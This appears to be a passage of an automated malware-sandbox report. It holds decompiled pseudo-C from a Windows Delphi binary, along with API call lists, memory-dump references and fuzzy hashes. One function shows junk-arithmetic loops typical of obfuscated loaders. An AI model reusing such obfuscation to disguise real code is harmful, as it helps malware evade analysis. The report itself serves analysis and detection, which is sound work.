                                                					_v100 = 0;
                                                					while(_v100 < 0xa) {
                                                						_v100 = _v100 + 1;
                                                						_t229 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF50 = _t229;
                                                						_t230 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feea0 = E0040489C(_t230);
                                                						_t232 =  *0x4feea0; // 0xa1d900
                                                						_t308 = _t232 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t308 <= 0) {
                                                							_t234 = _v108 + 0x3f;
                                                							__eflags = _t234;
                                                							_v56 = _t234;
                                                						} else {
                                                							_push(_v108);
                                                							_t287 =  *0x4feecc; // 0xd26bafe0
                                                							_v76 = E004EE798(_v104, _t267, _v56, _t287, _t308);
                                                						}
                                                						_t235 =  *0x4fef30; // 0xa1d816
                                                						_t309 = _t235 + E004FEF10 - E004FEF10; // 0x1cb931c0
                                                						if(_t309 == 0) {
                                                							_v80 = _v88 - _v48;
                                                						}
                                                						_v92 = _v64 * _v68;
                                                					}
                                                					_v72 = _v32 + _v28;
                                                					asm("fild dword [ebp-0x28]");
                                                					_v84 = E004048D8();
                                                					 *0x4fef14 = 0x65 -  *0x4fef04;
                                                					_t181 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef3c = _t181 *  *0x4fef30;
                                                					_v96 = _v60 + _v52;
                                                					E004F37A4( *_v8, _t267,  &_v648, _t288, _t289); // executed
                                                					E0040713C(_v8, 0x4f46c8, _v648);
                                                					_t190 =  *0x4feedc; // 0xbc3e19a
                                                					 *0x4fef14 = _t190;
                                                					_v76 = 0;
                                                					if(_v76 < 0xf) {
                                                						_v76 = _v76 + 1;
                                                						_v84 = _v52 - _v48;
                                                						_t218 =  *0x4fef4c; // 0x43c1493c
                                                						_t313 = _t218 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                						if(_t313 == 0) {
                                                							_v100 = 0;
                                                							while(_v100 < 7) {
                                                								_v100 = _v100 + 1;
                                                								E00406CF4( &_v12, L"NtSetDefaultLocale");
                                                							}
                                                						}
                                                						E00406CF4( &_v16, _v20);
                                                						_t222 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4feefc = _t222;
                                                						_t223 =  *0x4feefc; // 0x4b08dcc7
                                                						_t316 = _t223 -  *0x4fef14; // 0xb52124ca
                                                						if(_t316 > 0) {
                                                							_v68 = _v104 + 0x1e;
                                                						}
                                                					}
                                                					_v96 = 0;
                                                					while(_v96 < 5) {
                                                						_v96 = _v96 + 1;
                                                						_v112 = 0;
                                                						_v116 = _v12;
                                                						if(_v116 != 0) {
                                                							_v116 =  *((intOrPtr*)(_v116 - 4));
                                                						}
                                                						if(_v116 == 0x2a) {
                                                							_t212 = E004FEF0C; // 0xb52124bf
                                                							 *0x4feed8 = _t212;
                                                						}
                                                					}
                                                					_t193 =  *0x4feed8; // 0x1cb9338e
                                                					 *0x4feefc = _t193;
                                                					_t194 =  *0x4feefc; // 0x4b08dcc7
                                                					_t322 = _t194 -  *0x4fef14; // 0xb52124ca
                                                					if(_t322 <= 0) {
                                                						__eflags = 0x45;
                                                						_v88 = 0x45 - _v60;
                                                						_t197 = E004FEF38; // 0xc3c34fdc
                                                						E004FEF38 = E0040489C(_t197);
                                                					} else {
                                                						_v80 = 0x48 - _v92;
                                                					}
                                                					_v120 = _v16;
                                                					if(_v120 != 0) {
                                                						_v120 =  *((intOrPtr*)(_v120 - 4));
                                                					}
                                                					if(_v120 <= 0x22) {
                                                						asm("fild dword [0x4feef0]");
                                                						 *0x4fef28 = E004048D8();
                                                					} else {
                                                						_v108 = 0;
                                                						do {
                                                							_t204 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feea0 = _t204;
                                                							_v108 = _v108 + 1;
                                                						} while (_v108 != 1);
                                                					}
                                                					 *0x4feea0 = 4 -  *0x4feeec;
                                                				}
                                                				_pop(_t278);
                                                				 *[fs:eax] = _t278;
                                                				_pop(_t279);
                                                				 *[fs:eax] = _t279;
                                                				_push(E004F46BB);
                                                				E004069F0( &_v648);
                                                				return E00406A08( &_v24, 4);
                                                 			}

                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004F4684,?,00000000,004F46B4,?,?,?,00000000,?,004F4A42,00000000,004F4F22), ref: 004F437B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: DirectoryWindows
                                                • String ID: "$*$NtSetDefaultLocale
                                                • API String ID: 3619848164-1193084605
                                                • Opcode ID: 02fb8d28a59304ce8f44ee0d808acca0a28d084546408091dd7a04d92bc53992
                                                • Instruction ID: 38cd9ab25aa669de575b05808a85b99e05ef41cf5b016bf71ca6ee26c3c3f45a
                                                • Opcode Fuzzy Hash: 02fb8d28a59304ce8f44ee0d808acca0a28d084546408091dd7a04d92bc53992
                                                • Instruction Fuzzy Hash: E7E1F1B4D00259DFDB50DFAAE9849AEBBF1FB48305F10843AE504E7221DB389951CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E004067A4() {
                                                				void* _t20;
                                                				void* _t23;
                                                				intOrPtr _t31;
                                                				void* _t46;
                                                				struct HINSTANCE__* _t49;
                                                				void* _t57;
                                                
                                                				if( *0x4fd004 != 0) {
                                                					E00406684();
                                                					E0040670C(_t46);
                                                					 *0x4fd004 = 0;
                                                				}
                                                				if( *0x502bc8 != 0 && GetCurrentThreadId() ==  *0x502bf0) {
                                                					E004063DC(0x502bc4);
                                                					E004066E0(0x502bc4);
                                                				}
                                                				if( *0x00502BBC != 0 ||  *0x500050 == 0) {
                                                					L8:
                                                					if( *((char*)(0x502bbc)) == 2 &&  *0x4fd000 == 0) {
                                                						 *0x00502BA0 = 0;
                                                					}
                                                					if( *((char*)(0x502bbc)) != 0) {
                                                						L14:
                                                						E00406404();
                                                						if( *((char*)(0x502bbc)) <= 1 ||  *0x4fd000 != 0) {
                                                							_t15 =  *0x00502BA4;
                                                							if( *0x00502BA4 != 0) {
                                                								E00409A70(_t15);
                                                								_t31 =  *((intOrPtr*)(0x502ba4));
                                                								_t8 = _t31 + 0x10; // 0x400000
                                                								_t49 =  *_t8;
                                                								_t9 = _t31 + 4; // 0x400000
                                                								if(_t49 !=  *_t9 && _t49 != 0) {
                                                									FreeLibrary(_t49);
                                                								}
                                                							}
                                                						}
                                                						E004063DC(0x502b94);
                                                						if( *((char*)(0x502bbc)) == 1) {
                                                							 *0x00502BB8();
                                                						}
                                                						if( *((char*)(0x502bbc)) != 0) {
                                                							E004066E0(0x502b94);
                                                						}
                                                						if( *0x502b94 == 0) {
                                                							if( *0x500034 != 0) {
                                                								 *0x500034();
                                                							}
                                                							ExitProcess( *0x4fd000); // executed
                                                						}
                                                						memcpy(0x502b94,  *0x502b94, 0xc << 2);
                                                						_t57 = _t57 + 0xc;
                                                						0x4fd000 = 0x4fd000;
                                                						0x502b94 = 0x502b94;
                                                						goto L8;
                                                					} else {
                                                						_t20 = E00404558();
                                                						_t44 = _t20;
                                                						if(_t20 == 0) {
                                                							goto L14;
                                                						} else {
                                                							goto L13;
                                                						}
                                                						do {
                                                							L13:
                                                							E00404EA4(_t44);
                                                							_t23 = E00404558();
                                                							_t44 = _t23;
                                                						} while (_t23 != 0);
                                                						goto L14;
                                                					}
                                                				} else {
                                                					do {
                                                						 *0x500050 = 0;
                                                						 *((intOrPtr*)( *0x500050))();
                                                					} while ( *0x500050 != 0);
                                                					L8:
                                                					while(1) {
                                                					}
                                                				}
                                                			}










                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 004067DA
                                                • FreeLibrary.KERNEL32(00400000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 00406878
                                                • ExitProcess.KERNEL32(00000000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 004068B1
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction ID: 2cef897a65c3f9f24c974bef2023fa5822139320d2324ab680b78707f6b3ff79
                                                • Opcode Fuzzy Hash: 661a889378b60e9f03aeb24257628d88f9b135a1cf69fca45814ad682c619eba
                                                • Instruction Fuzzy Hash: 6E315C21A013519FEB21BB7A844871B76E46F04318F16883FE447A72D2D7BCD8A4CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E0040679C() {
                                                				intOrPtr* _t14;
                                                				void* _t23;
                                                				void* _t26;
                                                				intOrPtr _t34;
                                                				void* _t50;
                                                				struct HINSTANCE__* _t53;
                                                				void* _t64;
                                                
                                                				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                				if( *0x4fd004 != 0) {
                                                					E00406684();
                                                					E0040670C(_t50);
                                                					 *0x4fd004 = 0;
                                                				}
                                                				if( *0x502bc8 != 0 && GetCurrentThreadId() ==  *0x502bf0) {
                                                					E004063DC(0x502bc4);
                                                					E004066E0(0x502bc4);
                                                				}
                                                				if( *0x00502BBC != 0 ||  *0x500050 == 0) {
                                                					L9:
                                                					if( *((char*)(0x502bbc)) == 2 &&  *0x4fd000 == 0) {
                                                						 *0x00502BA0 = 0;
                                                					}
                                                					if( *((char*)(0x502bbc)) != 0) {
                                                						L15:
                                                						E00406404();
                                                						if( *((char*)(0x502bbc)) <= 1 ||  *0x4fd000 != 0) {
                                                							_t18 =  *0x00502BA4;
                                                							if( *0x00502BA4 != 0) {
                                                								E00409A70(_t18);
                                                								_t34 =  *((intOrPtr*)(0x502ba4));
                                                								_t8 = _t34 + 0x10; // 0x400000
                                                								_t53 =  *_t8;
                                                								_t9 = _t34 + 4; // 0x400000
                                                								if(_t53 !=  *_t9 && _t53 != 0) {
                                                									FreeLibrary(_t53);
                                                								}
                                                							}
                                                						}
                                                						E004063DC(0x502b94);
                                                						if( *((char*)(0x502bbc)) == 1) {
                                                							 *0x00502BB8();
                                                						}
                                                						if( *((char*)(0x502bbc)) != 0) {
                                                							E004066E0(0x502b94);
                                                						}
                                                						if( *0x502b94 == 0) {
                                                							if( *0x500034 != 0) {
                                                								 *0x500034();
                                                							}
                                                							ExitProcess( *0x4fd000); // executed
                                                						}
                                                						memcpy(0x502b94,  *0x502b94, 0xc << 2);
                                                						_t64 = _t64 + 0xc;
                                                						0x4fd000 = 0x4fd000;
                                                						0x502b94 = 0x502b94;
                                                						goto L9;
                                                					} else {
                                                						_t23 = E00404558();
                                                						_t48 = _t23;
                                                						if(_t23 == 0) {
                                                							goto L15;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						do {
                                                							L14:
                                                							E00404EA4(_t48);
                                                							_t26 = E00404558();
                                                							_t48 = _t26;
                                                						} while (_t26 != 0);
                                                						goto L15;
                                                					}
                                                				} else {
                                                					do {
                                                						 *0x500050 = 0;
                                                						 *((intOrPtr*)( *0x500050))();
                                                					} while ( *0x500050 != 0);
                                                					L9:
                                                					while(1) {
                                                					}
                                                				}
                                                			}











                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 004067DA
                                                • FreeLibrary.KERNEL32(00400000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 00406878
                                                • ExitProcess.KERNEL32(00000000,?,?,004FC554,?,004068DE,004045A3,004045EA,?,?,00404603), ref: 004068B1
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                  • Part of subcall function 0040670C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                  • Part of subcall function 0040670C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: bd2e960c19dd2ab2e713dd8a2671f13d410aa28cfe46dd547e52860ab6adaf01
                                                • Instruction ID: c02aab792ff7e2e5eb0b8afe4bda8f566001a16be7e09a702f86af92f89a990d
                                                • Opcode Fuzzy Hash: bd2e960c19dd2ab2e713dd8a2671f13d410aa28cfe46dd547e52860ab6adaf01
                                                • Instruction Fuzzy Hash: F9312B21A013419FEB21BF76849971A7BE46F04318F16883FE446A72D2D77CD8A4CB1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E004FC000(void* __ecx, void* __edx) {
                                                				intOrPtr _t19;
                                                				intOrPtr _t22;
                                                
                                                				_push(_t22);
                                                				_push(0x4fc0d7);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t22;
                                                				 *0x500988 =  *0x500988 - 1;
                                                				if( *0x500988 < 0) {
                                                					E00404C98();
                                                					E0040426C();
                                                					SetThreadLocale(0x400); // executed
                                                					E004088C4();
                                                					 *0x4fd00c = 2;
                                                					 *0x50001c = 0x402774;
                                                					 *0x500020 = 0x40277c;
                                                					 *0x500056 = 2;
                                                					 *0x50005c = E0040AFF4();
                                                					 *0x500008 = 0x408078;
                                                					E00404CF0(E00404CD4());
                                                					 *0x500064 = 0xd7b0;
                                                					 *0x500340 = 0xd7b0;
                                                					 *0x50061c = 0xd7b0;
                                                					 *0x50004c = GetCommandLineW();
                                                					 *0x500048 = E004028D4();
                                                					 *0x500978 = GetACP();
                                                					 *0x50097c = 0x4b0;
                                                					 *0x500040 = GetCurrentThreadId();
                                                					E0040B008();
                                                				}
                                                				_pop(_t19);
                                                				 *[fs:eax] = _t19;
                                                				_push(0x4fc0de);
                                                				return 0;
                                                			}






                                                APIs
                                                • SetThreadLocale.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC02D
                                                  • Part of subcall function 004088C4: InitializeCriticalSection.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088C9
                                                  • Part of subcall function 004088C4: GetVersion.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088D7
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088FE
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408904
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408918
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040891E
                                                  • Part of subcall function 004088C4: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408932
                                                  • Part of subcall function 004088C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408938
                                                  • Part of subcall function 0040AFF4: GetSystemInfo.KERNEL32 ref: 0040AFF8
                                                • GetCommandLineW.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC092
                                                  • Part of subcall function 004028D4: GetStartupInfoW.KERNEL32 ref: 004028E5
                                                • GetACP.KERNEL32(00000400,00000000,004FC0D7), ref: 004FC0A6
                                                • GetCurrentThreadId.KERNEL32 ref: 004FC0BA
                                                  • Part of subcall function 0040B008: GetVersion.KERNEL32(004FC0C9,00000400,00000000,004FC0D7), ref: 0040B008
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                • String ID:
                                                • API String ID: 2740004594-0
                                                • Opcode ID: 86b7be6f3b07a36d57f59285415004388bae5a5c4b0e3247f763d86c356b9e6d
                                                • Instruction ID: f31f0f49541c0d6808f0d04e770d596d3d4622fdfde316b3bf832ad6c22a9402
                                                • Opcode Fuzzy Hash: 86b7be6f3b07a36d57f59285415004388bae5a5c4b0e3247f763d86c356b9e6d
                                                • Instruction Fuzzy Hash: 0E111FB440434499E755FB76A91E71D3B90AB55308F81943EE604672E2DBBC0008AB6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E00418750(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                				char _v8;
                                                				char _v9;
                                                				int _v16;
                                                				void* _v20;
                                                				void* _v24;
                                                				int _v28;
                                                				int _t33;
                                                				int _t43;
                                                				int _t64;
                                                				intOrPtr _t72;
                                                				intOrPtr _t74;
                                                				signed int* _t77;
                                                				signed int* _t79;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr _t83;
                                                
                                                				_t81 = _t82;
                                                				_t83 = _t82 + 0xffffffe8;
                                                				_v8 = 0;
                                                				_t77 = __ecx;
                                                				_t79 = __edx;
                                                				_push(_t81);
                                                				_push(0x418850);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t83;
                                                				_v9 = 0;
                                                				E00406CF4( &_v8, __eax);
                                                				E00406E5C( &_v8);
                                                				_t33 = GetFileVersionInfoSizeW(E00407330(_v8),  &_v16); // executed
                                                				_t64 = _t33;
                                                				if(_t64 == 0) {
                                                					_pop(_t72);
                                                					 *[fs:eax] = _t72;
                                                					_push(0x418857);
                                                					return E004069A8( &_v8);
                                                				} else {
                                                					_v20 = E004044B4(_t64);
                                                					_push(_t81);
                                                					_push(0x418833);
                                                					_push( *[fs:edx]);
                                                					 *[fs:edx] = _t83;
                                                					_t43 = GetFileVersionInfoW(E00407330(_v8), _v16, _t64, _v20); // executed
                                                					if(_t43 != 0 && VerQueryValueW(_v20, 0x418864,  &_v24,  &_v28) != 0) {
                                                						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                						_v9 = 1;
                                                					}
                                                					_pop(_t74);
                                                					 *[fs:eax] = _t74;
                                                					_push(0x41883a);
                                                					return E004044D0(_v20);
                                                				}
                                                 			}

                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00418850), ref: 00418795
                                                • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00418833,?,00000000,?,00000000,00418850), ref: 004187CE
                                                • VerQueryValueW.VERSION(?,00418864,?,?,00000000,?,00000000,?,00000000,00418833,?,00000000,?,00000000,00418850), ref: 004187E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileInfoVersion$QuerySizeValue
                                                • String ID:
                                                • API String ID: 2179348866-0
                                                • Opcode ID: c3b0b502d5035f5daf200de3a4cc46812dc0de1d7565b881b145eb8ff7d36e21
                                                • Instruction ID: 71b798d31b8a8db47d3bffcaead5b231bc9b8ec913ef69a6c713ececfaec169f
                                                • Opcode Fuzzy Hash: c3b0b502d5035f5daf200de3a4cc46812dc0de1d7565b881b145eb8ff7d36e21
                                                • Instruction Fuzzy Hash: ED312471A04209AFDB01EFA9CD41EAEB7F9EB48704B91447AF944E3241DB78DD00DB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404398() {
                                                				intOrPtr _t13;
                                                				intOrPtr* _t14;
                                                				int _t18;
                                                				intOrPtr* _t23;
                                                				void* _t25;
                                                				void* _t26;
                                                				void* _t28;
                                                				void* _t31;
                                                
                                                				_t28 =  *0x00500AD8;
                                                				while(_t28 != 0x500ad4) {
                                                					_t2 = _t28 + 4; // 0x500ad4
                                                					VirtualFree(_t28, 0, 0x8000); // executed
                                                					_t28 =  *_t2;
                                                				}
                                                				_t25 = 0x37;
                                                				_t13 = 0x4fd064;
                                                				do {
                                                					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                					_t13 = _t13 + 0x20;
                                                					_t25 = _t25 - 1;
                                                				} while (_t25 != 0);
                                                				 *0x500ad4 = 0x500ad4;
                                                				 *0x00500AD8 = 0x500ad4;
                                                				_t26 = 0x400;
                                                				_t23 = 0x500b74;
                                                				do {
                                                					_t14 = _t23;
                                                					 *_t14 = _t14;
                                                					_t8 = _t14 + 4; // 0x500b74
                                                					 *_t8 = _t14;
                                                					_t23 = _t23 + 8;
                                                					_t26 = _t26 - 1;
                                                				} while (_t26 != 0);
                                                				 *0x500af0 = 0;
                                                				E004049A8(0x500af4, 0x80);
                                                				_t18 = 0;
                                                				 *0x500aec = 0;
                                                				_t31 =  *0x00502B7C;
                                                				while(_t31 != 0x502b78) {
                                                					_t18 = VirtualFree(_t31, 0, 0x8000); // executed
                                                					_t31 =  *(_t31 + 4);
                                                				}
                                                				 *0x502b78 = 0x502b78;
                                                				 *0x00502B7C = 0x502b78;
                                                				return _t18;
                                                 			}

                                                APIs
                                                • VirtualFree.KERNEL32(00500AD4,00000000,00008000,?,?,?,?,00404498,0040B166,00000000,0040B184), ref: 004043B6
                                                • VirtualFree.KERNEL32(?,00000000,00008000,00500AD4,00000000,00008000,?,?,?,?,00404498,0040B166,00000000,0040B184), ref: 00404432
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID: x+P
                                                • API String ID: 1263568516-3099085927
                                                • Opcode ID: cd4a7aff0d9da6c28d34d244d3cbb74c655cdd9999bc532fac1e385591dc2adf
                                                • Instruction ID: ad64f2d33904e0bf9d86bea76d341dbd416e76c2be8d3ab623fe03c609c213da
                                                • Opcode Fuzzy Hash: cd4a7aff0d9da6c28d34d244d3cbb74c655cdd9999bc532fac1e385591dc2adf
                                                • Instruction Fuzzy Hash: EA118CB17046108FC7648F189941B2ABAE0FB88714F15807EE649EB7C1D778AC028B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E0040976C(intOrPtr __eax, void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi) {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				char _v28;
                                                				signed int _t41;
                                                				signed short _t43;
                                                				signed short _t46;
                                                				signed int _t60;
                                                				intOrPtr _t69;
                                                				void* _t80;
                                                				signed int* _t82;
                                                				intOrPtr _t85;
                                                
                                                				_t80 = __edi;
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(0);
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_t82 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				E00406A8C(_v12);
                                                				_push(_t85);
                                                				_push(0x409883);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t85;
                                                				E004069A8(__ecx);
                                                				if(_v12 == 0) {
                                                					L14:
                                                					_pop(_t69);
                                                					 *[fs:eax] = _t69;
                                                					_push(E0040988A);
                                                					return E00406A08( &_v28, 6);
                                                				}
                                                				E00406CF4( &_v20, _v12);
                                                				_t41 = _v12;
                                                				if(_t41 != 0) {
                                                					_t41 =  *(_t41 - 4);
                                                				}
                                                				_t60 = _t41;
                                                				if(_t60 < 1) {
                                                					L7:
                                                					_t43 = E004094A8(_v8, _t60,  &_v16, _t82); // executed
                                                					_t91 = _v16;
                                                					if(_v16 == 0) {
                                                						L004027F4();
                                                						E00408E58(_t43, _t60,  &_v24, _t80, _t82);
                                                						_t46 = E004095D4(_v20, _t60, _t82, _v24, _t80, _t82, __eflags); // executed
                                                						__eflags =  *_t82;
                                                						if( *_t82 == 0) {
                                                							__eflags =  *0x502c08;
                                                							if( *0x502c08 == 0) {
                                                								L004027FC();
                                                								E00408E58(_t46, _t60,  &_v28, _t80, _t82);
                                                								E004095D4(_v20, _t60, _t82, _v28, _t80, _t82, __eflags);
                                                							}
                                                						}
                                                						__eflags =  *_t82;
                                                						if(__eflags == 0) {
                                                							E004096A0(_v20, _t60, _t82, __eflags); // executed
                                                						}
                                                					} else {
                                                						E004095D4(_v20, _t60, _t82, _v16, _t80, _t82, _t91);
                                                					}
                                                					goto L14;
                                                				}
                                                				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                					_t60 = _t60 - 1;
                                                					__eflags = _t60;
                                                					if(_t60 != 0) {
                                                						continue;
                                                					}
                                                					goto L7;
                                                				}
                                                				E00407678(_v12, _t60, 1,  &_v20);
                                                				goto L7;
                                                 			}

                                                APIs
                                                • GetUserDefaultUILanguage.KERNEL32(00000000,00409883,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040990A,00000000,?,00000105), ref: 00409817
                                                • GetSystemDefaultUILanguage.KERNEL32(00000000,00409883,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040990A,00000000,?,00000105), ref: 0040983F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: DefaultLanguage$SystemUser
                                                • String ID:
                                                • API String ID: 384301227-0
                                                • Opcode ID: 8ccc880a4083f4cf67cec9c159a58c1f28253716aa2231727ad32c9a7054b76d
                                                • Instruction ID: 4781f68dbc7189501f499a975775e18bb8ad6eb86817993ed410f212fd684c1a
                                                • Opcode Fuzzy Hash: 8ccc880a4083f4cf67cec9c159a58c1f28253716aa2231727ad32c9a7054b76d
                                                • Instruction Fuzzy Hash: C7313A31A102099BDB14EF9AC882BAEB7B4EB49704F50847BE401B33D2DB789D45DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E00409890(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				char _v8;
                                                				short _v530;
                                                				char _v536;
                                                				char _v540;
                                                				void* _t44;
                                                				intOrPtr _t45;
                                                				void* _t49;
                                                				void* _t52;
                                                
                                                				_v536 = 0;
                                                				_v540 = 0;
                                                				_v8 = 0;
                                                				_t49 = __eax;
                                                				_push(_t52);
                                                				_push(0x40994a);
                                                				_push( *[fs:eax]);
